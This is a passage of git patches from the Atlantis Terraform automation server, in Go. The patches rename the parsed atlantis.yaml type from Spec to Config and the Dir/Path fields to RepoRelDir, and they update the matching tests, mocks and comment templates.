-func (p *DefaultProjectCommandBuilder) getCfg(projectName string, dir string, workspace string, repoDir string) (*valid.Project, *valid.Spec, error) {
+func (p *DefaultProjectCommandBuilder) getCfg(projectName string, dir string, workspace string, repoDir string) (*valid.Project, *valid.Config, error) {
 	globalCfg, err := p.ParserValidator.ReadConfig(repoDir)
 	if err != nil && !os.IsNotExist(err) {
 		return nil, nil, err
@@ -224,7 +224,7 @@ func (p *DefaultProjectCommandBuilder) getCfg(projectName string, dir string, wo
 
 // matchingProjects returns the list of projects whose WhenModified fields match
 // any of the modifiedFiles.
-func (p *DefaultProjectCommandBuilder) matchingProjects(log *logging.SimpleLogger, modifiedFiles []string, config valid.Spec) ([]valid.Project, error) {
+func (p *DefaultProjectCommandBuilder) matchingProjects(log *logging.SimpleLogger, modifiedFiles []string, config valid.Config) ([]valid.Project, error) {
 	var projects []valid.Project
 	for _, project := range config.Projects {
 		log.Debug("checking if project at dir %q workspace %q was modified", project.Dir, project.Workspace)
diff --git a/server/events/yaml/mocks/matchers/valid_spec.go b/server/events/yaml/mocks/matchers/valid_spec.go
index 6aba4616e6..9c60066733 100644
--- a/server/events/yaml/mocks/matchers/valid_spec.go
+++ b/server/events/yaml/mocks/matchers/valid_spec.go
@@ -7,14 +7,14 @@ import (
 	valid "github.com/runatlantis/atlantis/server/events/yaml/valid"
 )
 
-func AnyValidSpec() valid.Spec {
-	pegomock.RegisterMatcher(pegomock.NewAnyMatcher(reflect.TypeOf((*(valid.Spec))(nil)).Elem()))
-	var nullValue valid.Spec
+func AnyValidConfig() valid.Config {
+	pegomock.RegisterMatcher(pegomock.NewAnyMatcher(reflect.TypeOf((*(valid.Config))(nil)).Elem()))
+	var nullValue valid.Config
 	return nullValue
 }
 
-func EqValidSpec(value valid.Spec) valid.Spec {
+func EqValidConfig(value valid.Config) valid.Config {
 	pegomock.RegisterMatcher(&pegomock.EqMatcher{Value: value})
-	var nullValue valid.Spec
+	var nullValue valid.Config
 	return nullValue
 }
diff --git a/server/events/yaml/mocks/mock_parser_validator.go b/server/events/yaml/mocks/mock_parser_validator.go
index f66c58778a..24655f8715 100644
--- a/server/events/yaml/mocks/mock_parser_validator.go
+++ b/server/events/yaml/mocks/mock_parser_validator.go
@@ -18,14 +18,14 @@ func NewMockParserValidator() *MockParserValidator {
 	return &MockParserValidator{fail: pegomock.GlobalFailHandler}
 }
 
-func (mock *MockParserValidator) ReadConfig(repoDir string) (valid.Spec, error) {
+func (mock *MockParserValidator) ReadConfig(repoDir string) (valid.Config, error) {
 	params := []pegomock.Param{repoDir}
-	result := pegomock.GetGenericMockFrom(mock).Invoke("ReadConfig", params, []reflect.Type{reflect.TypeOf((*valid.Spec)(nil)).Elem(), reflect.TypeOf((*error)(nil)).Elem()})
-	var ret0 valid.Spec
+	result := pegomock.GetGenericMockFrom(mock).Invoke("ReadConfig", params, []reflect.Type{reflect.TypeOf((*valid.Config)(nil)).Elem(), reflect.TypeOf((*error)(nil)).Elem()})
+	var ret0 valid.Config
 	var ret1 error
 	if len(result) != 0 {
 		if result[0] != nil {
-			ret0 = result[0].(valid.Spec)
+			ret0 = result[0].(valid.Config)
 		}
 		if result[1] != nil {
 			ret1 = result[1].(error)
diff --git a/server/events/yaml/parser_validator.go b/server/events/yaml/parser_validator.go
index a56ca586c6..d53e6d7716 100644
--- a/server/events/yaml/parser_validator.go
+++ b/server/events/yaml/parser_validator.go
@@ -21,59 +21,59 @@ type ParserValidator struct{}
 // ReadConfig returns the parsed and validated atlantis.yaml config for repoDir.
 // If there was no config file, then this can be detected by checking the type
 // of error: os.IsNotExist(error).
-func (p *ParserValidator) ReadConfig(repoDir string) (valid.Spec, error) {
+func (p *ParserValidator) ReadConfig(repoDir string) (valid.Config, error) {
 	configFile := filepath.Join(repoDir, AtlantisYAMLFilename)
 	configData, err := ioutil.ReadFile(configFile)
 
 	// NOTE: the error we return here must also be os.IsNotExist since that's
 	// what our callers use to detect a missing config file.
 	if err != nil && os.IsNotExist(err) {
-		return valid.Spec{}, err
+		return valid.Config{}, err
 	}
 
 	// If it exists but we couldn't read it return an error.
 	if err != nil {
-		return valid.Spec{}, errors.Wrapf(err, "unable to read %s file", AtlantisYAMLFilename)
+		return valid.Config{}, errors.Wrapf(err, "unable to read %s file", AtlantisYAMLFilename)
 	}
 
 	// If the config file exists, parse it.
 	config, err := p.parseAndValidate(configData)
 	if err != nil {
-		return valid.Spec{}, errors.Wrapf(err, "parsing %s", AtlantisYAMLFilename)
+		return valid.Config{}, errors.Wrapf(err, "parsing %s", AtlantisYAMLFilename)
 	}
 	return config, err
 }
 
-func (p *ParserValidator) parseAndValidate(configData []byte) (valid.Spec, error) {
-	var rawSpec raw.Spec
-	if err := yaml.UnmarshalStrict(configData, &rawSpec); err != nil {
-		return valid.Spec{}, err
+func (p *ParserValidator) parseAndValidate(configData []byte) (valid.Config, error) {
+	var rawConfig raw.Config
+	if err := yaml.UnmarshalStrict(configData, &rawConfig); err != nil {
+		return valid.Config{}, err
 	}
 
 	// Set ErrorTag to yaml so it uses the YAML field names in error messages.
 	validation.ErrorTag = "yaml"
 
-	if err := rawSpec.Validate(); err != nil {
-		return valid.Spec{}, err
+	if err := rawConfig.Validate(); err != nil {
+		return valid.Config{}, err
 	}
 
 	// Top level validation.
-	if err := p.validateWorkflows(rawSpec); err != nil {
-		return valid.Spec{}, err
+	if err := p.validateWorkflows(rawConfig); err != nil {
+		return valid.Config{}, err
 	}
 
-	validSpec := rawSpec.ToValid()
-	if err := p.validateProjectNames(validSpec); err != nil {
-		return valid.Spec{}, err
+	validConfig := rawConfig.ToValid()
+	if err := p.validateProjectNames(validConfig); err != nil {
+		return valid.Config{}, err
 	}
 
-	return validSpec, nil
+	return validConfig, nil
 }
 
-func (p *ParserValidator) validateProjectNames(spec valid.Spec) error {
+func (p *ParserValidator) validateProjectNames(config valid.Config) error {
 	// First, validate that all names are unique.
 	seen := make(map[string]bool)
-	for _, project := range spec.Projects {
+	for _, project := range config.Projects {
 		if project.Name != nil {
 			name := *project.Name
 			exists := seen[name]
@@ -88,7 +88,7 @@ func (p *ParserValidator) validateProjectNames(spec valid.Spec) error {
 	// This map's keys will be 'dir/workspace' and the values are the names for
 	// that project.
 	dirWorkspaceToNames := make(map[string][]string)
-	for _, project := range spec.Projects {
+	for _, project := range config.Projects {
 		key := fmt.Sprintf("%s/%s", project.Dir, project.Workspace)
 		names := dirWorkspaceToNames[key]
 
@@ -107,9 +107,9 @@ func (p *ParserValidator) validateProjectNames(spec valid.Spec) error {
 	return nil
 }
 
-func (p *ParserValidator) validateWorkflows(spec raw.Spec) error {
-	for _, project := range spec.Projects {
-		if err := p.validateWorkflowExists(project, spec.Workflows); err != nil {
+func (p *ParserValidator) validateWorkflows(config raw.Config) error {
+	for _, project := range config.Projects {
+		if err := p.validateWorkflowExists(project, config.Workflows); err != nil {
 			return err
 		}
 	}
diff --git a/server/events/yaml/parser_validator_test.go b/server/events/yaml/parser_validator_test.go
index fe11f82c72..7386608675 100644
--- a/server/events/yaml/parser_validator_test.go
+++ b/server/events/yaml/parser_validator_test.go
@@ -49,7 +49,7 @@ func TestReadConfig_UnmarshalErrors(t *testing.T) {
 		{
 			"random characters",
 			"slkjds",
-			"parsing atlantis.yaml: yaml: unmarshal errors:\n  line 1: cannot unmarshal !!str `slkjds` into raw.Spec",
+			"parsing atlantis.yaml: yaml: unmarshal errors:\n  line 1: cannot unmarshal !!str `slkjds` into raw.Config",
 		},
 		{
 			"just a colon",
@@ -78,7 +78,7 @@ func TestReadConfig(t *testing.T) {
 		description string
 		input       string
 		expErr      string
-		exp         valid.Spec
+		exp         valid.Config
 	}{
 		// Version key.
 		{
@@ -114,7 +114,7 @@ projects:
 			input: `
 version: 2
 projects:`,
-			exp: valid.Spec{
+			exp: valid.Config{
 				Version:   2,
 				Projects:  nil,
 				Workflows: map[string]valid.Workflow{},
@@ -134,7 +134,7 @@ projects:
 version: 2
 projects:
 - dir: .`,
-			exp: valid.Spec{
+			exp: valid.Config{
 				Version: 2,
 				Projects: []valid.Project{
 					{
@@ -164,7 +164,7 @@ projects:
   workflow: myworkflow
 workflows:
   myworkflow: ~`,
-			exp: valid.Spec{
+			exp: valid.Config{
 				Version: 2,
 				Projects: []valid.Project{
 					{
@@ -198,7 +198,7 @@ projects:
     enabled: false
 workflows:
   myworkflow: ~`,
-			exp: valid.Spec{
+			exp: valid.Config{
 				Version: 2,
 				Projects: []valid.Project{
 					{
@@ -309,7 +309,7 @@ projects:
 - name: myname2
   dir: .
   workspace: workspace`,
-			exp: valid.Spec{
+			exp: valid.Config{
 				Version: 2,
 				Projects: []valid.Project{
 					{
@@ -372,7 +372,7 @@ func TestReadConfig_Successes(t *testing.T) {
 	cases := []struct {
 		description string
 		input       string
-		expOutput   valid.Spec
+		expOutput   valid.Config
 	}{
 		{
 			description: "uses project defaults",
@@ -380,7 +380,7 @@ func TestReadConfig_Successes(t *testing.T) {
 version: 2
 projects:
 - dir: "."`,
-			expOutput: valid.Spec{
+			expOutput: valid.Config{
 				Version:   2,
 				Projects:  basicProjects,
 				Workflows: make(map[string]valid.Workflow),
@@ -395,7 +395,7 @@ projects:
   autoplan:
     when_modified: ["**/*.tf"]
 `,
-			expOutput: valid.Spec{
+			expOutput: valid.Config{
 				Version:   2,
 				Projects:  basicProjects,
 				Workflows: make(map[string]valid.Workflow),
@@ -408,7 +408,7 @@ version: 2
 projects:
 - dir: "."
 `,
-			expOutput: valid.Spec{
+			expOutput: valid.Config{
 				Version:   2,
 				Projects:  basicProjects,
 				Workflows: make(map[string]valid.Workflow),
@@ -422,7 +422,7 @@ projects:
 - dir: "."
 workflows: ~
 `,
-			expOutput: valid.Spec{
+			expOutput: valid.Config{
 				Version:   2,
 				Projects:  basicProjects,
 				Workflows: make(map[string]valid.Workflow),
@@ -441,7 +441,7 @@ workflows:
     apply:
       steps:
 `,
-			expOutput: valid.Spec{
+			expOutput: valid.Config{
 				Version:  2,
 				Projects: basicProjects,
 				Workflows: map[string]valid.Workflow{
@@ -473,7 +473,7 @@ workflows:
       - plan # we don't validate if they make sense
       - apply
 `,
-			expOutput: valid.Spec{
+			expOutput: valid.Config{
 				Version:  2,
 				Projects: basicProjects,
 				Workflows: map[string]valid.Workflow{
@@ -525,7 +525,7 @@ workflows:
       - apply:
           extra_args: ["a", "b"]
 `,
-			expOutput: valid.Spec{
+			expOutput: valid.Config{
 				Version:  2,
 				Projects: basicProjects,
 				Workflows: map[string]valid.Workflow{
@@ -573,7 +573,7 @@ workflows:
       steps:
       - run: echo apply "arg 2"
 `,
-			expOutput: valid.Spec{
+			expOutput: valid.Config{
 				Version:  2,
 				Projects: basicProjects,
 				Workflows: map[string]valid.Workflow{
diff --git a/server/events/yaml/raw/spec.go b/server/events/yaml/raw/config.go
similarity index 60%
rename from server/events/yaml/raw/spec.go
rename to server/events/yaml/raw/config.go
index aaebc05f33..5644948b22 100644
--- a/server/events/yaml/raw/spec.go
+++ b/server/events/yaml/raw/config.go
@@ -7,38 +7,39 @@ import (
 	"github.com/runatlantis/atlantis/server/events/yaml/valid"
 )
 
-type Spec struct {
+// Config is the representation for the whole config file at the top level.
+type Config struct {
 	Version   *int                `yaml:"version,omitempty"`
 	Projects  []Project           `yaml:"projects,omitempty"`
 	Workflows map[string]Workflow `yaml:"workflows,omitempty"`
 }
 
-func (s Spec) Validate() error {
+func (c Config) Validate() error {
 	equals2 := func(value interface{}) error {
 		if *value.(*int) != 2 {
 			return errors.New("must equal 2")
 		}
 		return nil
 	}
-	return validation.ValidateStruct(&s,
-		validation.Field(&s.Version, validation.NotNil, validation.By(equals2)),
-		validation.Field(&s.Projects),
-		validation.Field(&s.Workflows),
+	return validation.ValidateStruct(&c,
+		validation.Field(&c.Version, validation.NotNil, validation.By(equals2)),
+		validation.Field(&c.Projects),
+		validation.Field(&c.Workflows),
 	)
 }
 
-func (s Spec) ToValid() valid.Spec {
+func (c Config) ToValid() valid.Config {
 	var validProjects []valid.Project
-	for _, p := range s.Projects {
+	for _, p := range c.Projects {
 		validProjects = append(validProjects, p.ToValid())
 	}
 
 	validWorkflows := make(map[string]valid.Workflow)
-	for k, v := range s.Workflows {
+	for k, v := range c.Workflows {
 		validWorkflows[k] = v.ToValid()
 	}
-	return valid.Spec{
-		Version:   *s.Version,
+	return valid.Config{
+		Version:   *c.Version,
 		Projects:  validProjects,
 		Workflows: validWorkflows,
 	}
diff --git a/server/events/yaml/raw/spec_test.go b/server/events/yaml/raw/config_test.go
similarity index 88%
rename from server/events/yaml/raw/spec_test.go
rename to server/events/yaml/raw/config_test.go
index d7b83e53de..9d5e76c17d 100644
--- a/server/events/yaml/raw/spec_test.go
+++ b/server/events/yaml/raw/config_test.go
@@ -10,17 +10,17 @@ import (
 	"gopkg.in/yaml.v2"
 )
 
-func TestSpec_UnmarshalYAML(t *testing.T) {
+func TestConfig_UnmarshalYAML(t *testing.T) {
 	cases := []struct {
 		description string
 		input       string
-		exp         raw.Spec
+		exp         raw.Config
 		expErr      string
 	}{
 		{
 			description: "no data",
 			input:       "",
-			exp: raw.Spec{
+			exp: raw.Config{
 				Version:   nil,
 				Projects:  nil,
 				Workflows: nil,
@@ -29,7 +29,7 @@ func TestSpec_UnmarshalYAML(t *testing.T) {
 		{
 			description: "yaml nil",
 			input:       "~",
-			exp: raw.Spec{
+			exp: raw.Config{
 				Version:   nil,
 				Projects:  nil,
 				Workflows: nil,
@@ -38,17 +38,17 @@ func TestSpec_UnmarshalYAML(t *testing.T) {
 		{
 			description: "invalid key",
 			input:       "invalid: key",
-			exp: raw.Spec{
+			exp: raw.Config{
 				Version:   nil,
 				Projects:  nil,
 				Workflows: nil,
 			},
-			expErr: "yaml: unmarshal errors:\n  line 1: field invalid not found in struct raw.Spec",
+			expErr: "yaml: unmarshal errors:\n  line 1: field invalid not found in struct raw.Config",
 		},
 		{
 			description: "version set",
 			input:       "version: 2",
-			exp: raw.Spec{
+			exp: raw.Config{
 				Version:   Int(2),
 				Projects:  nil,
 				Workflows: nil,
@@ -57,7 +57,7 @@ func TestSpec_UnmarshalYAML(t *testing.T) {
 		{
 			description: "projects key without value",
 			input:       "projects:",
-			exp: raw.Spec{
+			exp: raw.Config{
 				Version:   nil,
 				Projects:  nil,
 				Workflows: nil,
@@ -66,7 +66,7 @@ func TestSpec_UnmarshalYAML(t *testing.T) {
 		{
 			description: "workflows key without value",
 			input:       "workflows:",
-			exp: raw.Spec{
+			exp: raw.Config{
 				Version:   nil,
 				Projects:  nil,
 				Workflows: nil,
@@ -75,7 +75,7 @@ func TestSpec_UnmarshalYAML(t *testing.T) {
 		{
 			description: "projects with a map",
 			input:       "projects:\n  key: value",
-			exp: raw.Spec{
+			exp: raw.Config{
 				Version:   nil,
 				Projects:  nil,
 				Workflows: nil,
@@ -85,7 +85,7 @@ func TestSpec_UnmarshalYAML(t *testing.T) {
 		{
 			description: "projects with a scalar",
 			input:       "projects: value",
-			exp: raw.Spec{
+			exp: raw.Config{
 				Version:   nil,
 				Projects:  nil,
 				Workflows: nil,
@@ -111,7 +111,7 @@ workflows:
       steps: []
     apply:
      steps: []`,
-			exp: raw.Spec{
+			exp: raw.Config{
 				Version: Int(2),
 				Projects: []raw.Project{
 					{
@@ -141,7 +141,7 @@ workflows:
 	}
 	for _, c := range cases {
 		t.Run(c.description, func(t *testing.T) {
-			var conf raw.Spec
+			var conf raw.Config
 			err := yaml.UnmarshalStrict([]byte(c.input), &conf)
 			if c.expErr != "" {
 				ErrEquals(t, c.expErr, err)
@@ -153,10 +153,10 @@ workflows:
 	}
 }
 
-func TestSpec_Validate(t *testing.T) {
+func TestConfig_Validate(t *testing.T) {
 	cases := []struct {
 		description string
-		input       raw.Spec
+		input       raw.Config
 		expErr      string
 	}{}
 	validation.ErrorTag = "yaml"
@@ -172,28 +172,28 @@ func TestSpec_Validate(t *testing.T) {
 	}
 }
 
-func TestSpec_ToValid(t *testing.T) {
+func TestConfig_ToValid(t *testing.T) {
 	cases := []struct {
 		description string
-		input       raw.Spec
-		exp         valid.Spec
+		input       raw.Config
+		exp         valid.Config
 	}{
 		{
 			description: "nothing set",
-			input:       raw.Spec{Version: Int(2)},
-			exp: valid.Spec{
+			input:       raw.Config{Version: Int(2)},
+			exp: valid.Config{
 				Version:   2,
 				Workflows: make(map[string]valid.Workflow),
 			},
 		},
 		{
 			description: "set to empty",
-			input: raw.Spec{
+			input: raw.Config{
 				Version:   Int(2),
 				Workflows: map[string]raw.Workflow{},
 				Projects:  []raw.Project{},
 			},
-			exp: valid.Spec{
+			exp: valid.Config{
 				Version:   2,
 				Workflows: map[string]valid.Workflow{},
 				Projects:  nil,
@@ -201,7 +201,7 @@ func TestSpec_ToValid(t *testing.T) {
 		},
 		{
 			description: "everything set",
-			input: raw.Spec{
+			input: raw.Config{
 				Version: Int(2),
 				Workflows: map[string]raw.Workflow{
 					"myworkflow": {
@@ -227,7 +227,7 @@ func TestSpec_ToValid(t *testing.T) {
 					},
 				},
 			},
-			exp: valid.Spec{
+			exp: valid.Config{
 				Version: 2,
 				Workflows: map[string]valid.Workflow{
 					"myworkflow": {
diff --git a/server/events/yaml/raw/raw.go b/server/events/yaml/raw/raw.go
index 0d93ef71c4..2c08e6a820 100644
--- a/server/events/yaml/raw/raw.go
+++ b/server/events/yaml/raw/raw.go
@@ -1,4 +1,4 @@
 // Package raw contains the golang representations of the YAML elements
-// supported in atlantis.yaml. It is called raw because no validation has
-// been done yet at this stage.
+// supported in atlantis.yaml. The structs here represent the exact data that
+// comes from the file before it is parsed/validated further.
 package raw
diff --git a/server/events/yaml/valid/valid.go b/server/events/yaml/valid/valid.go
index 8af0064be1..8046c0fa05 100644
--- a/server/events/yaml/valid/valid.go
+++ b/server/events/yaml/valid/valid.go
@@ -1,11 +1,11 @@
+// Package valid contains the structs representing the atlantis.yaml config
+// after it's been parsed and validated.
 package valid
 
 import "github.com/hashicorp/go-version"
 
-// Spec is the atlantis yaml spec after it's been parsed and validated.
-// The raw.Spec is transformed into the ValidSpec which is then used by the
-// rest of Atlantis.
-type Spec struct {
+// Config is the atlantis.yaml config after it's been parsed and validated.
+type Config struct {
 	// Version is the version of the atlantis YAML file. Will always be equal
 	// to 2.
 	Version   int
@@ -13,8 +13,8 @@ type Spec struct {
 	Workflows map[string]Workflow
 }
 
-func (s Spec) GetPlanStage(workflowName string) *Stage {
-	for name, flow := range s.Workflows {
+func (c Config) GetPlanStage(workflowName string) *Stage {
+	for name, flow := range c.Workflows {
 		if name == workflowName {
 			return flow.Plan
 		}
@@ -22,8 +22,8 @@ func (s Spec) GetPlanStage(workflowName string) *Stage {
 	return nil
 }
 
-func (s Spec) GetApplyStage(workflowName string) *Stage {
-	for name, flow := range s.Workflows {
+func (c Config) GetApplyStage(workflowName string) *Stage {
+	for name, flow := range c.Workflows {
 		if name == workflowName {
 			return flow.Apply
 		}
@@ -31,9 +31,9 @@ func (s Spec) GetApplyStage(workflowName string) *Stage {
 	return nil
 }
 
-func (s Spec) FindProjectsByDirWorkspace(dir string, workspace string) []Project {
+func (c Config) FindProjectsByDirWorkspace(dir string, workspace string) []Project {
 	var ps []Project
-	for _, p := range s.Projects {
+	for _, p := range c.Projects {
 		if p.Dir == dir && p.Workspace == workspace {
 			ps = append(ps, p)
 		}
@@ -41,8 +41,8 @@ func (s Spec) FindProjectsByDirWorkspace(dir string, workspace string) []Project
 	return ps
 }
 
-func (s Spec) FindProjectByName(name string) *Project {
-	for _, p := range s.Projects {
+func (c Config) FindProjectByName(name string) *Project {
+	for _, p := range c.Projects {
 		if p.Name != nil && *p.Name == name {
 			return &p
 		}

From 3339dcd92b4c3127b50ed4510c445f241591751d Mon Sep 17 00:00:00 2001
From: Luke Kysow <lkysow@gmail.com>
Date: Fri, 29 Jun 2018 18:05:47 +0200
Subject: [PATCH 56/69] Dir/Path -> RepoRelDir, path (in templates) -> dir

---
 server/events/command_runner.go               |  4 +-
 server/events/comment_parser_test.go          |  2 +-
 server/events/event_parser.go                 | 14 ++--
 server/events/event_parser_test.go            | 14 ++--
 server/events/markdown_renderer.go            | 16 ++---
 server/events/markdown_renderer_test.go       | 64 +++++++++----------
 server/events/models/models.go                |  5 +-
 server/events/project_command_builder.go      | 10 +--
 server/events/project_command_builder_test.go | 40 ++++++------
 server/events/project_command_runner.go       |  6 +-
 server/events/project_command_runner_test.go  | 18 +++---
 server/events/project_result.go               |  4 +-
 server/events/pull_closed_executor.go         | 12 ++--
 server/events/pull_closed_executor_test.go    |  8 +--
 server/events/runtime/apply_step_runner.go    |  2 +-
 .../events/runtime/apply_step_runner_test.go  | 16 ++---
 .../events/runtime/init_step_runner_test.go   |  6 +-
 .../events/runtime/plan_step_runner_test.go   | 20 +++---
 server/locks_controller.go                    |  2 +-
 server/locks_controller_test.go               |  2 +-
 .../modules-yaml/exp-output-autoplan.txt      |  8 +--
 .../modules-yaml/exp-output-merge.txt         |  4 +-
 .../modules/exp-output-apply-staging.txt.act  |  7 --
 .../modules/exp-output-merge-all-dirs.txt     |  4 +-
 .../modules/exp-output-merge-all-dirs.txt.act |  3 -
 .../modules/exp-output-merge-only-staging.txt |  2 +-
 .../test-repos/modules/exp-output-merge.txt   |  4 +-
 .../modules/exp-output-plan-staging.txt.act   | 31 ---------
 .../simple-yaml/exp-output-autoplan.txt       |  8 +--
 .../simple-yaml/exp-output-merge.txt          |  2 +-
 .../simple/exp-output-merge-workspaces.txt    |  2 +-
 .../test-repos/simple/exp-output-merge.txt    |  2 +-
 .../exp-output-merge.txt                      |  2 +-
 .../tfvars-yaml/exp-output-autoplan.txt       |  8 +--
 .../tfvars-yaml/exp-output-merge.txt          |  2 +-
 35 files changed, 158 insertions(+), 196 deletions(-)
 delete mode 100644 server/testfixtures/test-repos/modules/exp-output-apply-staging.txt.act
 delete mode 100644 server/testfixtures/test-repos/modules/exp-output-merge-all-dirs.txt.act
 delete mode 100644 server/testfixtures/test-repos/modules/exp-output-plan-staging.txt.act

diff --git a/server/events/command_runner.go b/server/events/command_runner.go
index c54891e87e..5297546a73 100644
--- a/server/events/command_runner.go
+++ b/server/events/command_runner.go
@@ -90,7 +90,7 @@ func (c *DefaultCommandRunner) RunAutoplanCommand(baseRepo models.Repo, headRepo
 			res := c.ProjectCommandRunner.Plan(cmd)
 			results = append(results, ProjectResult{
 				ProjectCommandResult: res,
-				Path:                 cmd.RepoRelPath,
+				RepoRelDir:           cmd.RepoRelDir,
 				Workspace:            cmd.Workspace,
 			})
 		}
@@ -152,7 +152,7 @@ func (c *DefaultCommandRunner) RunCommentCommand(baseRepo models.Repo, maybeHead
 			ctx.Log.Err("failed to determine desired command, neither plan nor apply")
 		}
 		return []ProjectResult{{
-			Path:                 cmd.Dir,
+			RepoRelDir:           cmd.RepoRelDir,
 			Workspace:            cmd.Workspace,
 			ProjectCommandResult: result,
 		}}, nil
diff --git a/server/events/comment_parser_test.go b/server/events/comment_parser_test.go
index db44003724..de127c7b8f 100644
--- a/server/events/comment_parser_test.go
+++ b/server/events/comment_parser_test.go
@@ -495,7 +495,7 @@ func TestParse_Parsing(t *testing.T) {
 			comment := fmt.Sprintf("atlantis %s %s", cmdName, test.flags)
 			r := commentParser.Parse(comment, models.Github)
 			Assert(t, r.CommentResponse == "", "CommentResponse should have been empty but was %q for comment %q", r.CommentResponse, comment)
-			Assert(t, test.expDir == r.Command.Dir, "exp dir to equal %q but was %q for comment %q", test.expDir, r.Command.Dir, comment)
+			Assert(t, test.expDir == r.Command.RepoRelDir, "exp dir to equal %q but was %q for comment %q", test.expDir, r.Command.RepoRelDir, comment)
 			Assert(t, test.expWorkspace == r.Command.Workspace, "exp workspace to equal %q but was %q for comment %q", test.expWorkspace, r.Command.Workspace, comment)
 			Assert(t, test.expVerbose == r.Command.Verbose, "exp verbose to equal %v but was %v for comment %q", test.expVerbose, r.Command.Verbose, comment)
 			actExtraArgs := strings.Join(r.Command.Flags, " ")
diff --git a/server/events/event_parser.go b/server/events/event_parser.go
index 0f82cd7afd..33504cd40d 100644
--- a/server/events/event_parser.go
+++ b/server/events/event_parser.go
@@ -55,9 +55,9 @@ func (c AutoplanCommand) IsAutoplan() bool {
 }
 
 type CommentCommand struct {
-	// Dir is the path relative to the repo root to run the command in.
+	// RepoRelDir is the path relative to the repo root to run the command in.
 	// Will never be an empty string and will never end in "/".
-	Dir string
+	RepoRelDir string
 	// CommentArgs are the extra arguments appended to comment,
 	// ex. atlantis plan -- -target=resource
 	Flags     []string
@@ -82,13 +82,13 @@ func (c CommentCommand) IsAutoplan() bool {
 }
 
 func (c CommentCommand) String() string {
-	return fmt.Sprintf("command=%q verbose=%t dir=%q workspace=%q project=%q flags=%q", c.Name.String(), c.Verbose, c.Dir, c.Workspace, c.ProjectName, strings.Join(c.Flags, ","))
+	return fmt.Sprintf("command=%q verbose=%t dir=%q workspace=%q project=%q flags=%q", c.Name.String(), c.Verbose, c.RepoRelDir, c.Workspace, c.ProjectName, strings.Join(c.Flags, ","))
 }
 
 // NewCommentCommand constructs a CommentCommand, setting all missing fields to defaults.
-func NewCommentCommand(dir string, flags []string, name CommandName, verbose bool, workspace string, project string) *CommentCommand {
-	// If dir was an empty string, this will return '.'.
-	validDir := path.Clean(dir)
+func NewCommentCommand(repoRelDir string, flags []string, name CommandName, verbose bool, workspace string, project string) *CommentCommand {
+	// If repoRelDir was an empty string, this will return '.'.
+	validDir := path.Clean(repoRelDir)
 	if validDir == "/" {
 		validDir = "."
 	}
@@ -96,7 +96,7 @@ func NewCommentCommand(dir string, flags []string, name CommandName, verbose boo
 		workspace = DefaultWorkspace
 	}
 	return &CommentCommand{
-		Dir:         validDir,
+		RepoRelDir:  validDir,
 		Flags:       flags,
 		Name:        name,
 		Verbose:     verbose,
diff --git a/server/events/event_parser_test.go b/server/events/event_parser_test.go
index ba558831bc..edecf5874d 100644
--- a/server/events/event_parser_test.go
+++ b/server/events/event_parser_test.go
@@ -320,8 +320,8 @@ func TestParseGitlabMergeCommentEvent(t *testing.T) {
 
 func TestNewCommand_CleansDir(t *testing.T) {
 	cases := []struct {
-		Dir    string
-		ExpDir string
+		RepoRelDir string
+		ExpDir     string
 	}{
 		{
 			"",
@@ -343,9 +343,9 @@ func TestNewCommand_CleansDir(t *testing.T) {
 	}
 
 	for _, c := range cases {
-		t.Run(c.Dir, func(t *testing.T) {
-			cmd := events.NewCommentCommand(c.Dir, nil, events.Plan, false, "workspace", "")
-			Equals(t, c.ExpDir, cmd.Dir)
+		t.Run(c.RepoRelDir, func(t *testing.T) {
+			cmd := events.NewCommentCommand(c.RepoRelDir, nil, events.Plan, false, "workspace", "")
+			Equals(t, c.ExpDir, cmd.RepoRelDir)
 		})
 	}
 }
@@ -359,7 +359,7 @@ func TestNewCommand_AllFieldsSet(t *testing.T) {
 	cmd := events.NewCommentCommand("dir", []string{"a", "b"}, events.Plan, true, "workspace", "project")
 	Equals(t, events.CommentCommand{
 		Workspace:   "workspace",
-		Dir:         "dir",
+		RepoRelDir:  "dir",
 		Verbose:     true,
 		Flags:       []string{"a", "b"},
 		Name:        events.Plan,
@@ -404,7 +404,7 @@ func TestCommentCommand_IsAutoplan(t *testing.T) {
 func TestCommentCommand_String(t *testing.T) {
 	exp := `command="plan" verbose=true dir="mydir" workspace="myworkspace" project="myproject" flags="flag1,flag2"`
 	Equals(t, exp, (events.CommentCommand{
-		Dir:         "mydir",
+		RepoRelDir:  "mydir",
 		Flags:       []string{"flag1", "flag2"},
 		Name:        events.Plan,
 		Verbose:     true,
diff --git a/server/events/markdown_renderer.go b/server/events/markdown_renderer.go
index eb06c4ead7..d21a683d70 100644
--- a/server/events/markdown_renderer.go
+++ b/server/events/markdown_renderer.go
@@ -51,9 +51,9 @@ type ResultData struct {
 }
 
 type ProjectResultTmplData struct {
-	Workspace string
-	Dir       string
-	Rendered  string
+	Workspace  string
+	RepoRelDir string
+	Rendered   string
 }
 
 // Render formats the data into a markdown string.
@@ -78,8 +78,8 @@ func (m *MarkdownRenderer) renderProjectResults(results []ProjectResult, common
 
 	for _, result := range results {
 		resultData := ProjectResultTmplData{
-			Workspace: result.Workspace,
-			Dir:       result.Path,
+			Workspace:  result.Workspace,
+			RepoRelDir: result.RepoRelDir,
 		}
 		if result.Error != nil {
 			resultData.Rendered = m.renderTemplate(errTmpl, struct {
@@ -124,14 +124,14 @@ func (m *MarkdownRenderer) renderTemplate(tmpl *template.Template, data interfac
 	return buf.String()
 }
 
-var singleProjectTmpl = template.Must(template.New("").Parse("{{$result := index .Results 0}}Ran {{.Command}} in dir: `{{$result.Dir}}` workspace: `{{$result.Workspace}}`\n{{$result.Rendered}}\n" + logTmpl))
+var singleProjectTmpl = template.Must(template.New("").Parse("{{$result := index .Results 0}}Ran {{.Command}} in dir: `{{$result.RepoRelDir}}` workspace: `{{$result.Workspace}}`\n{{$result.Rendered}}\n" + logTmpl))
 var multiProjectTmpl = template.Must(template.New("").Funcs(sprig.TxtFuncMap()).Parse(
 	"Ran {{.Command}} for {{ len .Results }} projects:\n" +
 		"{{ range $result := .Results }}" +
-		"1. workspace: `{{$result.Workspace}}` path: `{{$result.Dir}}`\n" +
+		"1. workspace: `{{$result.Workspace}}` dir: `{{$result.RepoRelDir}}`\n" +
 		"{{end}}\n" +
 		"{{ range $i, $result := .Results }}" +
-		"### {{add $i 1}}. workspace: `{{$result.Workspace}}` path: `{{$result.Dir}}`\n" +
+		"### {{add $i 1}}. workspace: `{{$result.Workspace}}` dir: `{{$result.RepoRelDir}}`\n" +
 		"{{$result.Rendered}}\n" +
 		"---\n{{end}}" +
 		logTmpl))
diff --git a/server/events/markdown_renderer_test.go b/server/events/markdown_renderer_test.go
index 040c47731e..88c19ad1fc 100644
